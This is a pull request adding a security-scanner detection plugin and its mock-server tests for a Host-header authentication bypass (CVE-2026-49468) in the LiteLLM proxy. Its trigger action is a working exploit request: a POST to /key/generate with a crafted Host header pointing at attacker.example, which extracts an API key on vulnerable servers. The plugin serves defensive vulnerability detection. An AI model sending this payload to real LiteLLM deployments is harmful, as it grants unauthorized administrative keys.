### PR TITLE
feat(templated):CVE-2026-49468-litellm

### DIFF
--- a/templated/templateddetector/plugins/cve/2026/Litellm_Auth_Bypass_CVE_2026_49468.textproto
+++ b/templated/templateddetector/plugins/cve/2026/Litellm_Auth_Bypass_CVE_2026_49468.textproto
@@ -1,0 +1,78 @@
+# proto-file: proto/templated_plugin.proto
+# proto-message: TemplatedPlugin
+
+###############
+# PLUGIN INFO #
+###############
+
+info: {
+  type: VULN_DETECTION
+  name: "Litellm_Auth_Bypass_CVE_2026_49468"
+  author: "mangeshwalsane2-hash"
+  version: "1.0"
+}
+
+finding: {
+  main_id: {
+    publisher: "GOOGLE"
+    value: "CVE-2026-49468"
+  }
+  severity: CRITICAL
+  title: "Host Header Authentication Bypass affecting LiteLLM proxy (CVE-2026-49468)"
+  description: "LiteLLM contains an authentication bypass vulnerability via Host header route confusion. By sending a crafted Host header containing a fragment or control sequence (e.g., #@), an attacker can bypass authorization gates on administrative routes such as /key/generate."
+  recommendation: "Upgrade LiteLLM to version 1.84.0 or higher."
+  related_id: {
+    publisher: "CVE"
+    value: "CVE-2026-49468"
+  }
+}
+
+config: {}
+
+###########
+# ACTIONS #
+###########
+
+actions: {
+  name: "fingerprint_litellm"
+  http_request: {
+    method: GET
+    uri: "/health/readiness"
+    response: {
+      http_status: 200
+    }
+  }
+}
+
+actions: {
+  name: "trigger_auth_bypass"
+  http_request: {
+    method: POST
+    uri: "/key/generate"
+    headers: [
+      { name: "Host" value: "localhost:4000/#@attacker.example" },
+      { name: "Content-Type" value: "application/json" }
+    ]
+    data: "{\"models\": [\"*\"]}"
+    response: {
+      http_status: 200
+      expect_all: {
+        conditions: [
+          { body: {} contains: "\"key\":\"sk-" }
+        ]
+      }
+    }
+  }
+}
+
+
+#############
+# WORKFLOWS #
+#############
+
+workflows: {
+  actions: [
+    "fingerprint_litellm",
+    "trigger_auth_bypass"
+  ]
+}

--- a/templated/templateddetector/plugins/cve/2026/Litellm_Auth_Bypass_CVE_2026_49468_test.textproto
+++ b/templated/templateddetector/plugins/cve/2026/Litellm_Auth_Bypass_CVE_2026_49468_test.textproto
@@ -1,0 +1,67 @@
+# proto-file: proto/templated_plugin_tests.proto
+# proto-message: TemplatedPluginTests
+
+config: {
+  tested_plugin: "Litellm_Auth_Bypass_CVE_2026_49468"
+}
+
+tests: {
+  name: "whenVulnerable_returnsTrue"
+  expect_vulnerability: true
+
+  mock_http_server: {
+    mock_responses: [
+      {
+        uri: "/health/readiness"
+        status: 200
+        body_content: "{\"status\":\"ok\"}"
+      },
+      {
+        uri: "/key/generate"
+        status: 200
+        body_content: "{\"key\":\"sk-wP0uPRhJaJtgJGTU0O_nQg\",\"models\":[\"*\"]}"
+        headers: [
+          { name: "Content-Type" value: "application/json" }
+        ]
+      }
+    ]
+  }
+}
+
+tests: {
+  name: "whenNotVulnerable_returnsFalse"
+  expect_vulnerability: false
+
+  mock_http_server: {
+    mock_responses: [
+      {
+        uri: "/health/readiness"
+        status: 200
+        body_content: "{\"status\":\"ok\"}"
+      },
+      {
+        uri: "/key/generate"
+        status: 401
+        body_content: "{\"error\":{\"message\":\"Authentication Error, No api key passed in.\",\"type\":\"auth_error\"}}"
+        headers: [
+          { name: "Content-Type" value: "application/json" }
+        ]
+      }
+    ]
+  }
+}
+
+tests: {
+  name: "whenNotLitellm_returnsFalse"
+  expect_vulnerability: false
+
+  mock_http_server: {
+    mock_responses: [
+      {
+        uri: "TSUNAMI_MAGIC_ANY_URI"
+        status: 404
+        body_content: "Not Found"
+      }
+    ]
+  }
+}


### PR DESCRIPTION
Added plugin for Host Header Authentication Bypass affecting LiteLLM proxy (CVE-2026-49468), please review and approve.
Created testbeds at: https://github.com/google/security-testbeds/pull/238